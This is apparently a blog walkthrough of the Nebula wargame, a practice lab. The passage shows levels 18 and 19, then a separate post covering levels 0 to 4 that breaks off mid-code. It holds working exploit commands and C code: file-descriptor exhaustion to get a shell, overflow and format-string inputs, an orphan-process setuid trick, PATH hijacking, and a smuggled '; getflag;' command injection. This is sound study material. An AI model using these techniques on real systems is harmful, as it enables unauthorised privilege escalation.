<span class="w"> </span><span class="n">globals</span><span class="p">.</span><span class="n">loggedin</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="s">"shell"</span><span class="p">,</span><span class="w"> </span><span class="mi">5</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">dvprintf</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span><span class="w"> </span><span class="s">"attempting to start shell</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">globals</span><span class="p">.</span><span class="n">loggedin</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">execve</span><span class="p">(</span><span class="s">"/bin/sh"</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">,</span><span class="w"> </span><span class="n">envp</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">err</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="s">"unable to execve"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">dprintf</span><span class="p">(</span><span class="s">"Permission denied</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="s">"logout"</span><span class="p">,</span><span class="w"> </span><span class="mi">4</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">globals</span><span class="p">.</span><span class="n">loggedin</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="s">"closelog"</span><span class="p">,</span><span class="w"> </span><span class="mi">8</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">globals</span><span class="p">.</span><span class="n">debugfile</span><span class="p">)</span><span class="w"> </span><span class="n">fclose</span><span class="p">(</span><span class="n">globals</span><span class="p">.</span><span class="n">debugfile</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">globals</span><span class="p">.</span><span class="n">debugfile</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="s">"site exec"</span><span class="p">,</span><span class="w"> </span><span class="mi">9</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">notsupported</span><span class="p">(</span><span class="n">line</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">10</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="s">"setuser"</span><span class="p">,</span><span class="w"> </span><span class="mi">7</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">setuser</span><span class="p">(</span><span class="n">line</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">8</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<h4>Trying with gdb</h4>
<p>First I tried to debug the <code>./flag18</code> binary with <code>gdb</code> and overwrite the <code>globals.loggedin</code> global
such that it would spawn the shell upon entering <code>shell</code> on stdin. That did indeed work, but the shell
wasn't run with <code>flag18</code> privileges, because a setuid binary started under gdb runs with the real user id of the
invoking user instead of the effective user id of the file owner. In other words, set-user-ID privileges are dropped by default when debugging.</p>
<h4>Trying to use the LD_PRELOAD trick</h4>
<p>Then I tried to apply the LD_PRELOAD trick by overriding <code>fopen()</code> to always return NULL, such that the <code>login()</code> function
would succeed. I used the following code:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// Compile with:</span>
<span class="c1">// gcc -Wall -fPIC -shared -o fopen.so fopen.c</span>
<span class="c1">// Then:</span>
<span class="c1">// LD_PRELOAD=fopen.so</span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span><span class="cp"></span>
<span class="kt">FILE</span><span class="w"> </span><span class="o">*</span><span class="nf">fopen</span><span class="p">(</span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">path</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">mode</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Always failing fopen</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>But this approach is also doomed to fail, because the LD_PRELOAD trick doesn't work with setuid binaries. The loader
will only load libraries that also have the setuid bit set and can be found in standard locations such as <code>/usr/lib/</code>.</p>
<blockquote>
<p>For set-user-ID/set-group-ID ELF binaries, only libraries in the standard
search directories that are also set-user-ID will be loaded.</p>
</blockquote>
<h4>Real, effective and the saved user id.</h4>
<p>After not having success upon quick examination, it's time to review some of the first lines
in the code:</p>
<div class="highlight"><pre><span></span><code><span class="n">setresgid</span><span class="p">(</span><span class="n">getegid</span><span class="p">(),</span><span class="w"> </span><span class="n">getegid</span><span class="p">(),</span><span class="w"> </span><span class="n">getegid</span><span class="p">());</span><span class="w"></span>
<span class="n">setresuid</span><span class="p">(</span><span class="n">geteuid</span><span class="p">(),</span><span class="w"> </span><span class="n">geteuid</span><span class="p">(),</span><span class="w"> </span><span class="n">geteuid</span><span class="p">());</span><span class="w"></span>
</code></pre></div>
<p>setresXid sets the real, effective and saved user/group id of the calling process. But what are these different
user identifiers for?</p>
<ul>
<li>effective user id (euid): Used for access checks (like opening a file) and as the owner of newly created files. This represents
the actual capabilities of the process.</li>
<li>real user id (ruid): The id of the user who started the process. When no setuid bit is set on the executable, it is
the same as the effective user id.</li>
<li>saved user id (suid): Keeps track of the original effective user id, so that a process can lower its privileges temporarily and regain them later.</li>
</ul>
<p>So the above calls to <code>setresgid()</code> and <code>setresuid()</code> set all of these ids to the same value: the effective group/user id.</p>
<h4>The hard way - buffer overflow</h4>
<p>There is a buffer overflow in the function <code>setuser()</code>. There, a buffer of 128 bytes is filled by <code>sprintf()</code>
with user input of unbounded length:</p>
<div class="highlight"><pre><span></span><code><span class="kt">char</span><span class="w"> </span><span class="n">msg</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span><span class="w"></span>
<span class="n">sprintf</span><span class="p">(</span><span class="n">msg</span><span class="p">,</span><span class="w"> </span><span class="s">"unable to set user to '%s' -- not supported.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">user</span><span class="p">);</span><span class="w"></span>
</code></pre></div>
<p>To trigger the overrun, call it like this:</p>
<div class="highlight"><pre><span></span><code>python -c <span class="s1">'print "setuser " + 150 * "A"'</span> <span class="p">|</span> ./flag18 -vvvvv -d /tmp/dbg
</code></pre></div>
<h4>Format string vulnerabilities</h4>
<p>Then there is the function:</p>
<div class="highlight"><pre><span></span><code><span class="kt">void</span><span class="w"> </span><span class="nf">notsupported</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">what</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">buffer</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">asprintf</span><span class="p">(</span><span class="o">&</span><span class="n">buffer</span><span class="p">,</span><span class="w"> </span><span class="s">"--> [%s] is unsupported at this current time.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">what</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">dprintf</span><span class="p">(</span><span class="n">what</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>which can be used to exploit format string vulnerabilities. An example might be to enter the following
after having called flag18 with <code>./flag18 -vvvvv -d /dev/tty</code>:</p>
<div class="highlight"><pre><span></span><code>site <span class="nb">exec</span> %s%s%s%s%s%s%s%s%s
got <span class="o">[</span>site <span class="nb">exec</span> %s%s%s%s%s%s%s%s%s<span class="o">]</span> as input
F<~F<F<u<span class="err">'</span>VHBBu,OOOOOOOPgot <span class="o">[</span>%s<span class="o">]</span> as input
,--> <span class="o">[</span>%s%s%s%s%s%s%s%s%s<span class="o">]</span> is unsupported at this current time.
</code></pre></div>
<h4>The solution</h4>
<p>All of these attacks are either not feasible or hard to mount (especially the memory corruption attacks).
So after having spent some hours on level 18, I couldn't come up with a solution and looked at
other writeups on the internet, where I found the solution at <a href="http://louisrli.github.io/blog/2012/08/17/nebula2/#.Vh-KfR93lhE">http://louisrli.github.io/blog/2012/08/17/nebula2/#.Vh-KfR93lhE</a>.</p>
<p>The idea is to make <code>fopen()</code> fail. I saw earlier that <code>globals.loggedin = 1;</code> is outside of the if statement
and that it would be executed when <code>fopen()</code> fails. But it didn't occur to me that <code>fopen()</code> will fail once
there are no more file descriptors left and that we can <em>actually open file descriptors in ./flag18</em> by sending
enough <strong>login foo</strong> commands. First check the soft limit of maximum open fds:</p>
<div class="highlight"><pre><span></span><code>level18@nebula:/home/flag18$ <span class="nb">ulimit</span> -Sn
<span class="m">1024</span>
</code></pre></div>
<p>Then create a file with 1025 'login' commands followed by a 'closelog' and a 'shell' command. The closelog
will free one file descriptor again such that the <code>execve()</code> call will succeed.</p>
<div class="highlight"><pre><span></span><code>python -c <span class="s1">'open("/home/level18/flood", "w").write("login foo\n"*1025 + "closelog\n" + "shell\n")'</span>
</code></pre></div>
<p>Then exploit the <code>./flag18</code> binary:</p>
<div class="highlight"><pre><span></span><code>cat ~/flood <span class="p">|</span> ./flag18 --init-file /foo -d /dev/tty -vvvvv
</code></pre></div>
<p>Because <code>execve("/bin/sh", argv, envp);</code> will call the shell with all args supplied here, we need
an argument that makes the shell ignore them (the job of <code>--init-file</code>).</p>
<p>This will yield a shell and we are done!</p>
<h4>Sidenote</h4>
<p>Actually the code is misleading. I assumed that every fd would be closed in the <code>login()</code> function:</p>
<div class="highlight"><pre><span></span><code><span class="kt">void</span><span class="w"> </span><span class="nf">login</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">pw</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">FILE</span><span class="w"> </span><span class="o">*</span><span class="n">fp</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">fp</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fopen</span><span class="p">(</span><span class="n">PWFILE</span><span class="p">,</span><span class="w"> </span><span class="s">"r"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">fp</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">file</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">fgets</span><span class="p">(</span><span class="n">file</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">file</span><span class="p">)</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">fp</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">dprintf</span><span class="p">(</span><span class="s">"Unable to read password file %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">PWFILE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">fclose</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">pw</span><span class="p">,</span><span class="w"> </span><span class="n">file</span><span class="p">)</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="k">return</span><span class="p">;</span><span class="w"> </span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">dprintf</span><span class="p">(</span><span class="s">"logged in successfully (with%s password file)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="n">fp</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"out"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">""</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">globals</span><span class="p">.</span><span class="n">loggedin</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Because if the file is opened successfully and its contents are read, it is closed again immediately. But apparently
that does not happen and the fds stay open. Why?</p>
<h2>Level 19 - Orphaned Processes belong to init!</h2>
<p>In level 19 we have a setuid C program that first creates a path to the <code>procfs</code> of its parent
process: <code>snprintf(buf, sizeof(buf)-1, "/proc/%d", getppid());</code>.</p>
<p>We need to make <code>stat()</code> return <code>st_uid == 0</code> for that path. This is only possible if the
<code>/proc/pid</code> directory of the parent process is owned by the root user.</p>
<p>I didn't solve this level on my own and peeked at the solution at <>. The basic idea is to make use of
the default behaviour of Unix processes: a child is reassigned to the init process when its parent process
exits before the child does. </p>
<p>So the idea is to create a program that <code>forks</code>, waits until the parent process dies (by calling <code>sleep</code>) and finally
calls the <code>/home/flag19/flag19</code> setuid binary with <code>execve()</code>.</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><unistd.h></span><span class="cp"></span>
<span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">envp</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">childPID</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fork</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">childPID</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// forked</span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">childPID</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// child</span>
<span class="w"> </span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">setresuid</span><span class="p">(</span><span class="n">geteuid</span><span class="p">(),</span><span class="n">geteuid</span><span class="p">(),</span><span class="n">geteuid</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">args</span><span class="p">[]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="s">"/bin/sh"</span><span class="p">,</span><span class="w"> </span><span class="s">"-c"</span><span class="p">,</span><span class="w"> </span><span class="s">"/bin/getflag"</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">};</span><span class="w"></span>
<span class="w"> </span><span class="n">execve</span><span class="p">(</span><span class="s">"/home/flag19/flag19"</span><span class="p">,</span><span class="w"> </span><span class="n">args</span><span class="p">,</span><span class="w"> </span><span class="n">envp</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>Nebula Wargame walkthrough Level 0-92015-09-28T23:52:00+02:002015-09-28T23:52:00+02:00Nikolai Tschachertag:incolumitas.com,2015-09-28:/2015/09/28/nebula-wargame-walkthrough-level-0-9/<p>In this blog post we will walk through the solutions of the levels 0 to 9 of the <em>Nebula</em> wargame, which is
hosted on <a href="http://exploit-exercises.com">http://exploit-exercises.com</a>. This writeup will force me to memorize commands better and exercise a bit. I fear that this writeup is of
no use for other people, since you hopefully want to solve those exercises on your own :)</p>
<h2>Level 0 - Finding setuid programs in the filesystem</h2>
<p>As the description states, you need to find a setuid binary that gets a shell for the <em>flag00</em> user.
We can find setuid executables with a command such as the following:</p>
<p><code>find / -type f -perm -4000 -user flag00 2>/dev/null</code></p>
<p>This command suppresses error messages (the <code>2>/dev/null</code> part redirects error output to /dev/null).
Furthermore, the <code>-perm -4000</code> test matches files that have the setuid bit set. The man page describes <code>-perm -mode</code> as follows:</p>
<div class="highlight"><pre><span></span><code>All of the permission bits mode are set for the file. Symbolic modes are accepted in this form, and this is usually the way in which would want to use
them. You must specify `u', `g' or `o' if you use a symbolic mode. See the EXAMPLES section for some illustrative examples.
</code></pre></div>
<p>Now execute the found binary and run <code>getflag</code> and you should be done.</p>
<h2>Level 1 - Exploiting PATH vulnerabilities</h2>
<p>This level is also really easy. We need to trick the following code into running the program <code>getflag</code> as the user <code>flag01</code>:</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdlib.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><unistd.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><string.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><sys/types.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span><span class="cp"></span>
<span class="kt">int</span><span class="w"> </span><span class="n">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">envp</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">gid_t</span><span class="w"> </span><span class="n">gid</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">uid_t</span><span class="w"> </span><span class="n">uid</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">gid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">getegid</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="n">uid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">geteuid</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="n">setresgid</span><span class="p">(</span><span class="n">gid</span><span class="p">,</span><span class="w"> </span><span class="n">gid</span><span class="p">,</span><span class="w"> </span><span class="n">gid</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">setresuid</span><span class="p">(</span><span class="n">uid</span><span class="p">,</span><span class="w"> </span><span class="n">uid</span><span class="p">,</span><span class="w"> </span><span class="n">uid</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">system</span><span class="p">(</span><span class="s">"/usr/bin/env echo and now what?"</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>As we all know, <code>/usr/bin/env</code> executes a program with the current environment. And the environment includes the
<code>$PATH</code> variable that specifies where programs can be found, such that users don't need to type the whole path.</p>
<p>Of course we can prepend a folder of our own to the PATH variable and place a program called <code>echo</code> there.</p>
<div class="highlight"><pre><span></span><code>mkdir /tmp/bin
<span class="nb">echo</span> -e <span class="s1">'#!/bin/bash\necho "executing with id $(id)";\ngetflag'</span> > /tmp/bin/echo <span class="o">&&</span> chmod +x /tmp/bin/echo
<span class="nv">PATH</span><span class="o">=</span>/tmp/bin/:<span class="nv">$PATH</span>
level01@nebula:/home/flag01$ ./flag01
executing with id <span class="nv">uid</span><span class="o">=</span><span class="m">998</span><span class="o">(</span>flag01<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span><span class="m">1002</span><span class="o">(</span>level01<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span><span class="m">998</span><span class="o">(</span>flag01<span class="o">)</span>,1002<span class="o">(</span>level01<span class="o">)</span>
You have successfully executed getflag on a target account
</code></pre></div>
<h2>Level 2 - Command Injection in setuid C programs</h2>
<p>Level 2 is very easy. The vulnerability is a basic command injection flaw. When you see the following lines
in the code:</p>
<div class="highlight"><pre><span></span><code><span class="n">buffer</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="n">asprintf</span><span class="p">(</span><span class="o">&</span><span class="n">buffer</span><span class="p">,</span><span class="w"> </span><span class="s">"/bin/echo %s is cool"</span><span class="p">,</span><span class="w"> </span><span class="n">getenv</span><span class="p">(</span><span class="s">"USER"</span><span class="p">));</span><span class="w"></span>
<span class="n">printf</span><span class="p">(</span><span class="s">"about to call system(</span><span class="se">\"</span><span class="s">%s</span><span class="se">\"</span><span class="s">)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">buffer</span><span class="p">);</span><span class="w"></span>
<span class="n">system</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span><span class="w"></span>
</code></pre></div>
<p>it becomes clear how to call <code>getflag</code> on the target account:</p>
<div class="highlight"><pre><span></span><code>level02@nebula:/home/flag02$ <span class="nv">USER</span><span class="o">=</span><span class="s1">'; getflag; echo'</span>
level02@nebula:/home/flag02$ ./flag02
about to call system<span class="o">(</span><span class="s2">"/bin/echo ; getflag; echo is cool"</span><span class="o">)</span>
You have successfully executed getflag on a target account
is cool
</code></pre></div>
<p>I just ended the current command with <code>;</code>, appended our own command and
handed the remaining text to a new <code>echo</code> command.</p>
<h2>Level 3 - Exploiting cronjobs</h2>
<p><strong>NOT SOLVED YET</strong></p>
<p>In Level 3 we can write in the home directory and create our own executable scripts.
These are executed with a cronjob script that looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/bin/sh</span>
<span class="k">for</span> i <span class="k">in</span> /home/flag03/writable.d/* <span class="p">;</span> <span class="k">do</span>
<span class="o">(</span><span class="nb">ulimit</span> -t <span class="m">5</span><span class="p">;</span> bash -x <span class="s2">"</span><span class="nv">$i</span><span class="s2">"</span><span class="o">)</span>
rm -f <span class="s2">"</span><span class="nv">$i</span><span class="s2">"</span>
<span class="k">done</span>
</code></pre></div>
<p>We need to consider the <code>ulimit -t 5</code> call, which limits the CPU time of each script to 5 seconds.</p>
<p><code>bash -x</code> runs each script with tracing enabled. I simply created a small script <code>test.sh</code> in <code>writable.d</code> with the following
contents:</p>
<div class="highlight"><pre><span></span><code>getflag
</code></pre></div>
<h2>Level 4 - Bypassing filters with symlinks</h2>
<p>This level requires us to read the file <code>token</code> in the <code>/home/flag04</code> directory, which we cannot access directly.
But there is a setuid binary that runs with euid flag04 and has the following code:</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdlib.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><unistd.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><string.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><sys/types.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><fcntl.h></span><span class="cp"></span>
<span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">envp</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">buf</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="n">rc</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">argc</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"%s [file to read]</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strstr</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span><span class="w"> </span><span class="s">"token"</span><span class="p">)</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"You may not access '%s'</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">fd</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">open</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span><span class="w"> </span><span class="n">O_RDONLY</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">fd</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">err</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">,</span><span class="w"> </span><span class="s">"Unable to open %s"</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
